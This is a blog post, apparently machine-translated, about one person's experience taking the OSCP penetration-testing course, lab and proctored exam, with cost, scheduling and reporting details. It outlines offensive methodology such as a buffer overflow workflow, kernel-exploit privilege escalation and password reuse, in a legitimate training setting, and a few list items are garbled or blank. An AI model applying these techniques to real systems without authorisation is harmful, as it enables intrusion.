Get best of the week

How I rented OSCP



My colleagues and I took the OSCP course and passed the exam. In this article I will describe in detail how the exam passes, what are the pitfalls and whether the game is worth the candle at all.

How it all began


My colleague c4ntwo years ago he said that we should pass the OSCP and I agreed, but as is often the case with good ideas, we scored put off this good idea.

A year later, our company had the opportunity to free training on useful things for employees (alas, my understanding doesn’t coincide with the management and the sommelier courses still refuse to pay me). By the glorious undertaking to pass OSCP pulledGolovnyaD, said that our excuses about employment are so-so and that we need to proceed.

And we started.

What did we know about OSCP


We knew that OSCP consists, in fact, of 3 parts: theoretical material (hereinafter I will call it pdf), access to a laboratory with virtual machines (hereinafter I will call lab) and an exam.

The beginning of the way


As it turned out, access to the lab can be purchased for 30, 60 or 90 days, it costs $ 999, $ 1199, $ 1349. Since we did not want to devote all our free time only to OSCP, and the difference between 30 days and 90 is only $ 350), we chose access for 90 days.

On October 9, 2019, I paid for the course, expecting to get fun for 3 months, how wrong I was, I got fun for 5 months. And here's why: the

first setup: you can’t start training tomorrow. In my case, the nearest start date was October 20 (as they say on the forums, the average time to start after payment is 2 weeks).

Then on October 9th they sent a test package (Connectivity Pack) for connecting to a VPN. Judging by their tests, I had no problems with the VPN connection (as it turned out then they had a so-called test, I'll tell you later). Then they sent a link to their assembly Kali (in appearance is no different from the usual), which is specially prepared for the passage.

Course start


Formally, the course began at 3:00 AM on October 20, but a letter with the course materials arrived at 03:09 (I noticed this discrepancy only now when I was writing the article). The letter with the course materials contains links to:

  • 380 pages pdfku
  • video footage to this pdfk
  • VPN Connectivity Pack

And here we are faced with a second setup: download links are valid for 72 hours and if they didn’t have time to download, they will ask for an additional $ 100, after which they carefully say make a backup and insert a joke: “ Remember the wise saying:“ There are two types of people. Those who backup and those who have yet to lose everything to a system crash. »
Also, in all forums it is recommended to begin the course with the tasks from pdfk. We all did just that.

Tasks from PDF


Tasks from pdfk need to be done in order to learn new tools and techniques, to remember how to use tools and, possibly, to get 5 additional points in the exam. From the surprising: in pdfk there is not a word about Burp Suite and PowerShell Empire (should have been added in the February update).

conducts its story from the basics: we are taught to google, use nc.exe (netcat), tcpdump and wireshark and other tools that are more likely to be related to systems engineering, rather than security. Only on page 113 of 380 do we get acquainted with nmap!

We are also taught to use tools such as OpenVAS, which can not be used in the exam. Also, examples often use meterpreter, which is also prohibited (can be used only on one machine). In general, I still did not understand what caused this ban on meterpreter as it went, it is clear that you can forbid it to increase with its help, but it would be convenient to keep the reverse going with several consoles.

It becomes interesting from page 148 where the buffer overflow begins, and here I caught the problem with the VPN connection. As it turned out, my ISP cuts the size of the packets, and the VPN in the lab is built using UDP and my packets with buffer overflows simply did not crawl through and disappear. The solution is simple - fix the config by adding the lines:

tun-mtu 1492
mssfix 1370

But it’s very unfortunate that such checks are not done by the OSCP organizers, because on their forum many complain. I lost 5 hours and a lot of nerves on this (reaching the solution myself, then I found a bunch of branches on the forum about this).

In order to write buffer overflows and do all sorts of experiments with windows, they give us a virtual machine inside the lab, this is quite convenient. For the entire course, I did not install a single virtual machine of my own (once I tried to install Windows XP SP2, but did not find a working torrent).

In general, tasks for buffer overflows are very well written out (for both Windows and Linux), it would be cool to do this in steps, taught in universities. The OSCP course obviously says that bypassing DEP and ASLR is not included in the course.

Then they tell us how to prepare exploits, transfer files, talk about privilege escalation, but with that we still play enough in the lab, so that's okay.

Next comes the block on attacks on users (Client Side Attacks), where I caught the problem with a “specially prepared” Kali machine, it had a newer version of Java, and my Java Appet did not work on the test machine. Another 5 hours of googling and solving the problem on your own and, of course, there is a thread on the forum about this)

Generally, everything can be found on the forum, this is a very useful place if you are stuck in a dead end, but I understood this only at the end of the course.

Next come the attacks on the web - XSS, LFI, RFI, SQL injection and more. It is written clearly and well, give examples of poking. They talk about sqlmap, which also can not be used in the exam, but, of course, it is useful to know.

Further attacks on passwords (brute force and obtaining hashes for Windows and Linux) are very extended for me, I left some of the tasks for later (and did them already inside the lab). At the end there is a story about the metasplit and how to use it, in great detail, with writing your own module. It also provides an example of hacking into a fictitious company that uses many of the techniques described (takes 34 pages).

In general, out of all the pdfs on the case of 100 pages (and there are a huge number of screenshots). It took me 2 weeks to read it and complete the tasks (but I was in no hurry).

- , , , .


Solving the lab, it was decided not to use Metasploit and Meterpreter, because they cannot be (only possible once) used in the exam.

Laba consists of approximately 60 virtual machines, all machines are divided into 4 subnets (public network, network of developers, network of IT departments, network of administrators). Initially, access is only in the public network (in fact, access is in all networks, we just can’t reverse the machines from a non-public network). In the lab (I write about events before the February update), all the machines are quite old, the most recent Windows is Windows server 2012R2 (quite a lot of Windows XP), Linux machines are Ubuntu 14 (Ubuntu 8 were also in the lab), Centos 7 (Centos 5 also met )

In theory, the whole lab should be solved using vulnerabilities published before 2016, but I did not set myself such restrictions.

Laba (non privileged access was on)


In general, the lab well corresponds to what was stated in pdfk. In terms of obtaining unprivileged access, you need to use various techniques (including attacks on clients), collect passwords from broken machines and reuse them, launch brutes and so on. Probably the worst topic is SQL injection and blind injection - they have never been seen before.

The algorithm for access initialization went everywhere as in life:

  1. Enumeration of ports and services
  2. brute directories for the web
  3. defining products and versions
  4. exploit search and modification

A couple of machines require writing your own exploits with a blackbox, but nothing complicated - LFI / RFI. Most of all, I was glad that there are almost no cars from the CTF category, where there is a picture inside which there is also a picture hidden, inside which a zip archive is hidden, and so on.

Laba (privilege escalation)


For me it was the most interesting part and it took me most of the time (at first).

Windows


For windows machines, I used these sets of splits.

But on some Windows machines all vulnerabilities of the “kernel” were specially patched and I had to figure out how to get up. There are cars for every taste, services, startups, sheduled tasks, installed software. Installed software is of course a big failure, because it’s obvious that the cars are prepared and if only one application is installed on the system, then you can climb through it.

Linux


For Linux, of course, you can always use kernel vulnerabilities, everyone’s beloved dirty cow works on half the machines, I used this version , although it hangs on almost all the machines in the lab, it successfully creates a user with ssh access.

But almost everywhere you can get up through vulnerabilities in the configuration, LinEnum helps here , and for lazy linux-smart-enumeration

In general, it is not worth abusing kernel vulnerabilities in the lab, if you want to prepare for the exam, it is better to use configuration vulnerabilities, because all machines in the exam will be with fresh kernels and installed updates (at least I got these).

Postexplotation in the lab


I left part of the post-exploitation for later, but after collecting all the passwords and viewing all the databases, configuration files and logs, you can easily access many machines (especially in a non-public network).

Many machines break down the chain, it is important to understand this, especially for attacks on clients, if the car is called mail, then maybe someone will cling to it as an email client), and if HELPDESK, then go to open tickets.

The big four


There are 4 cars in the lab that are considered the most complex and some recommend leaving them at the end, these are: Pain, Sufferance, Gh0st and Humble. I knew about their presence from the very beginning, but I did not specifically run away from them or did not seek them. By the time I decided to return to them, two of the four I had already broken.

My impression of them:

  • Pain is a cool car, complicated both in getting the initializing shell and in raising.
  • Sufferance - a complex initializing walk, in several stages, I got something similar on the exam. Simple boost.
  • Gh0st - the beginning and initializing was like CTF machines, but one of the most beautiful enhancements in the entire lab.
  • Humble - arguably the most complex initializing walk in the lab, but a simple boost.

In general, these are cool cars, and I’m almost sure that if you broke them in your lab, then you will pass the exam without any problems, I broke the Humble one longer than I did the exam.

My top would include:

  • Sherlock - proof turns out in a couple of minutes, and you can sit for a long time to get a reverse.
  • beta is a very vital machine, both in obtaining primary access and in upgrades (limited bash).

Lab results


In general, the lab made a good impression, I broke all the cars that I took (about 45 cars).

In general, I remembered a lot of things that are not often used.

Exam preparation


A few days before the end of access to the lab, I decided it was time to sign up for the exam. Here I was wrong, it is better to do this in advance. The nearest date on the day off was only a month later on February 23 (and then at 9 a.m.).

The conclusion and the setup are three - if you want to take the exam at a convenient time and sign up for the weekend in advance.

I also started writing a report on the lab (I need to describe 10 cars, if you want to get 5 extra points), the standard example of the report is too smart, so I started using this one. For a detailed description, I chose either interesting cars or cases where you immediately get the root.

I needed to take 10-15 additional screenshots, so I recommend having access to the lab while writing this report.

Exam preparation. Training. Binarism


In the exam, one of the components is writing an exploit to overflow the buffer, it gives 25 points, and, not knowing how to do it quickly and well, going to the exam doesn’t make much sense, it’s worth getting a hand in it.

Good people have already put together a set of software on which to practice.

I decided about 7 pieces, and if I spent 2 hours on the first, then I decided the seventh in 20 minutes, in fact, with the speed of writing code and entering commands. An algorithm that did not fail me:

  1. we are phasing the fall with the letters A (in the exam this step will already be done for us)
  2. looking for offset, standardly through pattern_create.rb and pattern_offset.rb
  3. check the length, standardly change A to B in the right place, and after B insert a lot of C to see the possible size of the payload without jumping into our buffer
  4. ( \x00, 99% )
  5. “jmp esp” ( , )
  6. ,
  7. ( 20 — \x90)

. .


In one of the exams procedure vraytaps , I found this picture:



This picture shows which cars on hackthebox.eu it looks like cars from the exam (the brainfuck car doesn’t look like it at all, I recommend not training it). To activate the wheelbarrows, a paid subscription is required (10 bucks per month, do not forget to cancel it right away ).

I spent 8 hours and decided on 10 machines, alternating between Windows and Linux. And he decided that it’s enough for me, but, probably, here, like with buffer overflow, it is necessary to bring to automatism. These cars are simpler than cars in the exam, at least in terms of privilege escalation (some copies of cars from the lab, I don’t know who I borrowed from anyone).

Exam preparation. Training. Privilege escalation


You can train on the same machines with hackthebox.eu, but in general it will be enough to read vraytapy to understand what techniques are there, there are examples of all the techniques that you may need in the exam.

Exam preparation. Organizational part


To pass the exam you will need:

  1. foreign passport (your name and surname must be written in English)
  2. Webcam
  3. stable internet

It’s good to have extra:

  1. backup internet (I used mobile)
  2. a spare computer (I had a spare laptop next to me that was fully configured to take an exam)
  3. VM snapshot with Kali
  4. copy of VM with Kali (I put one copy on the hard drive, the second on the external hard drive)

Exam!


The exam is considered full-time (Proctored Exam) so it starts 15 minutes before the selected time. You connect to a special web platform, rummage your screens, in a text chat they start asking you tasks and questions:

  1. show passport by webcam
  2. show that nobody is in the room
  3. give test script results for connection

Then I had a file and when I tried to copy a new end-user pack to a virtual machine with Kali, it fell. I was ready for this, rolled back the virtual machine, copied the pack, launched it and started to wait for 9 in the morning.

I got access at 9:01.

I had a simple action plan:

  1. start numbering of services
  2. make a car for buffer overflow in 1 hour
  3. make a car for 10 points in 1 hour
  4. make the first car for 20 points in 2 hours
  5. make a second car for 20 points in 2 hours
  6. make a car for 25 points in 3 hours

As you can see from my plan, it took me 9 hours to pass the exam, but it didn’t go according to plan from the very beginning :) I forgot to take into account an important inhibitory factor - to write down in steps everything that was done with all screenshots for the report.

The final result I got is the following:

  1. buffer overflow - 2.5 hours. I lost an hour, because did not notice a couple of bad characters, another 30 minutes for reports
  2. car in 10 - 30 minutes: 10 minutes hacking, 20 minutes screenshots
  3. first car in 20 - 2.5 hours: 1.5 hours hacking, 40 minutes screenshots and report, 20 minutes break
  4. second car in 20 - 2 hours: 1.5 hours hacking, 30 minutes screenshots and report.
  5. car for 25 - 3.5 hours: 3 hours hacking (with two breaks), 30 minutes screenshots and report

In general, the exam is much more interesting than labs, the vulnerabilities are all quite recent - 2018-2019. Enhancements are not everywhere through kernel vulnerabilities.

I sat for the longest time, waiting for privilege escalation, all unprivileged shells were received in 10-30 minutes.

The exam has done many false paths that will not lead to success. If everything is easily discarded for the initializing shell (for example, an exploit for buffer overflow on Windows XP SP2, although the service itself is running on Windows 10), then in the upgrade I got stuck in these false paths a couple of times. The main thing here is to tell yourself in time that this vector is worth changing and choosing a new one.

After 11 hours, I finished the exam, breaking everything and went to drink a couple of pints of beer (just a couple, since the next day we still have to write a formal beautiful report).

Writing and sending a report


I took the template from the same repository where the template for the labs and filled it in 4 hours.

Then the fun began with where to send it and how. First you need to encrypt it using 7z with a password, the password is not random, and your ID is in the system (5 digits, it flies in 0.3 seconds on the CPU). Then I searched for information for a long time where to put the report on the lab in the same archive or in another (Answer: you need to put it in the same archive). Then I ran into the fact that the format for setting the password in the 7z archive, the -p flag, after which the password must be written together, i.e. something like -pPassword. In fact, all the steps are described in the guide , you just need to be able to look for them.

The resulting archive must be uploaded to the site, get a link and send this link to special mail! Why such difficulties in 2020 is a mystery to me.

After a couple of hours, you will receive a response letter that: “We received your link, but did not verify that it has a normal archive, that it is decrypted and that it contains the necessary data. And that we will report the results of the exam within 10 working days. "

Total


Exactly a week after the exam, on Sunday March 1, I received a joyful letter that I had compiled the archive correctly:



After that I filled in the data for sending me a physical certificate and an OSCP certification card.

Who needs this certification?


I got the following list (sorted by the meaningfulness of receipt and the requirements of this certificate):

  1. 4-5 year students. For them, this is a very cool practice.
  2. those who decided to move to safety from related industries. Everything is described at a good level, a lot of examples, there is something to learn.
  3. employer. The certificate shows that a person knows something and knows how to do something with his hands (in our vacancies we indicate this as a plus).
  4. people in the industry who want to refresh / test their knowledge
  5. experienced pentesters. Perhaps a beautiful crust will allow them to become more interesting for employers.

Further plans to pass OSWE (Offensive Security Web Expert). As for me, he is more interesting than the OSCE (Offensive Security Certified Expert). And for those who are interested in reading about the various types of certification in the field of information security, we wrote a separate article .

More articles:


All Articles